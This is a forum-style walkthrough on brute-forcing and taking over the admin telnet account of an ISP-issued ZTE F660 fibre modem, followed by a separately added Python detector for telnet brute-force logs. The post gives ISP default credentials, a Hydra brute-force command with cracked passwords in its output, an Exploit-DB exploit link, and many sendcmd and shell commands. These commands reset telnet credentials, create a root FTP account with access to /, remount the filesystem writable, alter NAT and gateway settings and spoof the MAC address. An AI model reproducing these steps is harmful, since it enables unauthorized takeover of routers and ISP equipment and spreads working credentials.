
By the way: I got bay.uy for myself so I can enjoy something Bulgarian and homegrown on the other side of the big water

------------------------------------
The case: Cracking the telnet (port 23) admin password to gain the benefits of "owning" your modem.
Hardware modem provided by ISP: ZTE F660
ISP: ANTEL (Uruguay)
Network: FTTH PON
Situation: The local ISP (ANTEL) provides one user password to access very basic modem features, which is:
user | user
...and for the techie install stuff they give another one:
instalador | wwzz2233
which is loaded with a little bit more stuff, but we hack, right?!
We need all functionality to belong to us!
Before researching I tried well-known hacks, without success.
http://192.168.1.1/web_shell_cmd.gch
http://192.168.1.1/hidden_version_switch.gch
http://192.168.1.1/manager_dev_query_t.gch
No way, they did not work at all!
I ran nmap to find what is running and which ports are open!
(look at the provided archive, and thanks to Gaston Asudrian for the modem)
So basically this is my procedure (cleverness is not blindness), but you know that too, right!?
Use at your own risk!
1. Find a good Telnet (brute-force) password cracker.
I use the excellent choice for the job - Hydra
https://github.com/vanhauser-thc/thc-hydra
Yes, it wins against Medusa and Ncrack, but you know that ')
2. Download Hydra and launch a CMD (command line, CLI) in the folder containing hydra.exe
You're still using Microsoft Windows! Aren't you?!
Code:
hydra -l admin -x 1:8:Aa1 telnet://192.168.1.1

3. Now you need patience; in my case ~3 weeks, as I had recently moved to re-establish a whole new fucking life in Uruguay, in particular at this time in Montevideo.
Meanwhile I found a lot of information regarding the whole system structure, the hardware equipment and nodes used, etc. Doesn't matter ')
(I still hold an engineering degree in lasers, optics and fine mechanics; again, look at the provided document if you are interested)
Yo-ho-ho and a bottle of rum!
4. Voila! After a few weeks I finally got it, and now I can telnet into my router and use very cool stuff in the provided BusyBox interface. Now let the hack begin.
[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.1.1 login: admin password: Ql52jP23
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 09:34:06
5. Meanwhile Daniel Cisa has published his exploit:
https://www.exploit-db.com/exploits/36978/
Thanks man with this the rest is much easier!
Firmware: 2.22.21P1T8S
Confirmed that works fine on 2.22.21P1T12S too
The last cracked password was: 5DhD64Je
6. Looking at the provided BIN with a hex editor, I found that this binary will be shown as a nicely readable plain database using the excellent NirSoft RouterPassView - http://nirsoft.net/utils/router_password_recovery.html
(and yes, he fixed exactly the problem with ZTE routers in build 1.65)
Run the program and ignore antivirus warnings, because you're da real man bro
Drag and drop the config.bin downloaded via the exploitable HTML page which you found in the step above, but you know that too!
This is madness, you know, I know, the NSA knows, everyone knows ')
So I am making notes here on HOW and WHY to make this shit work for us:
For this research we use the sendcmd command to make manipulation of the "Read-Only" DB system.
Read carefully below and apply at your own risk.
Don't try to explain bullshit to your ISP, because the shitty system logs almost everything and The Guardian is operative, but you know this too, as always ')
This is the command which gives us the table that holds the admin password:
Code:
sendcmd 1 DB p TelnetCfg
Code:
sendcmd 1 DB all
Code:
sendcmd 1 DB p TelnetCfg
sendcmd 1 DB set TelnetCfg 0 TS_UName admin
sendcmd 1 DB set TelnetCfg 0 TS_UPwd Ql52jP23
sendcmd 1 DB set TelnetCfg 0 TS_Port "23"
sendcmd 1 DB save
Useful commands to see a lot of stuff inside the modem:
(I didn't explain them in detail here, because you know them too, sorry ')
Code:
sendcmd 1 DB all
sendcmd 1 DB p TelnetCfg
sendcmd 1 DB p WANC
sendcmd 1 DB p MgtServer
sendcmd 1 DB p VoIPSIPLine all
sendcmd 1 DB p FTPUser
cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/version
cat /proc/cmdline
cat /proc/devices
cat /proc/mtd
cat /proc/cpuinfo
cat /proc/mounts
cat /etc/fstab
nvram show | grep ssid
nvram show | grep wps
nvram config set wl0_wps_config_state=0
nvram show | grep ssid
lsmod
ls /proc
ifconfig
iptables -vL
brctl show
ls kmodule/
df
mount -n -o remount,rw /
With this command you can convert the read-only file system to a read-write file system.
To change it back to a read-only file system:
mount -n -o remount,ro /
sendcmd 1 DB p VoIPSIPLine all > /mnt/usb1_1/666_VoIPSIPLine.xml
"/mnt/" >> "/"
sendcmd 1 DB set FTPUser 0 Location /
sendcmd 1 DB save
sendcmd 1 DB set FTPServerCfg 0 FtpEnable 1
sendcmd 1 DB set FTPUser 1 ViewName IGD.FTPUSER1
sendcmd 1 DB set FTPUser 1 Username root
sendcmd 1 DB set FTPUser 1 Password C.O.R.E.
sendcmd 1 DB set FTPUser 1 Location /
sendcmd 1 DB set FTPUser 1 UserRight 1
sendcmd 1 DB save
sendcmd 1 DB set WANC 1 IsNAT 0
sendcmd 1 DB set WANC 1 IsForward 0
sendcmd 1 DB set WANC 1 IsDefGW 0
sendcmd 1 DB save
setmac show
setmac 1 256 XX:XX:XX:XX:XX:XX
cd /mnt/usb1_1
./config.ash
-----------by Pixel PIrate for now----------------
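An added defensive example, not part of the original post or of any tool it mentions: a small detector for the telnet brute-force pattern the post describes (a burst of failed logins from one source, then a success), run over constructed syslog-style lines, plus a helper that computes how many candidates Hydra's `-x 1:8:Aa1` mask covers. The log line format, the year, the hostname and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed syslog-style sample lines (assumed format, not real ZTE F660 output).
SAMPLE_LOG = """\
Apr 17 09:33:01 gateway telnetd: login failed user=admin from=192.168.1.50
Apr 17 09:33:01 gateway telnetd: login failed user=admin from=192.168.1.50
Apr 17 09:33:02 gateway telnetd: login failed user=admin from=192.168.1.50
Apr 17 09:33:02 gateway telnetd: login failed user=admin from=192.168.1.50
Apr 17 09:33:03 gateway telnetd: login failed user=admin from=192.168.1.50
Apr 17 09:34:06 gateway telnetd: login ok user=admin from=192.168.1.50
Apr 17 09:40:00 gateway telnetd: login failed user=user from=192.168.1.77
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ telnetd: login (?P<result>failed|ok) "
    r"user=(?P<user>\S+) from=(?P<src>\S+)$"
)

def parse(line, year=2015):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # syslog carries no year, so one is assumed for the timestamp arithmetic
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Alert once per source reaching `threshold` failures in `window_s` seconds, and again on a later success."""
    recent = defaultdict(deque)   # source -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        q = recent[src]
        if result == "failed":
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, user, len(q)))
        elif src in flagged:   # a success right after a burst is the interesting event
            alerts.append(("success-after-bruteforce", src, user, len(q)))
    return alerts

def mask_keyspace(min_len, max_len, charset_size=62):   # A-Z, a-z, 0-9 = 62 symbols
    return sum(charset_size ** n for n in range(min_len, max_len + 1))
```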